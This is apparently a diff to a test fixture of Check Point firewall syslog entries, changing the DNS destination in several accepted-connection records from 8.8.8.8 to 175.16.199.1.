-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55788"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41787"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50638"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33138"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55788"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41787"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50638"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.54.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52424"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"13.48.174.89"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55058"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48429"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33204"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48429"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33204"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"13.53.104.115"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53246"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53927"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60505"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53927"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60505"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.81.140.246"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57354"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.81.140.246"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57356"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42171"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38516"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39098"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60880"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39591"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42171"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38516"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39098"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60880"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39591"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
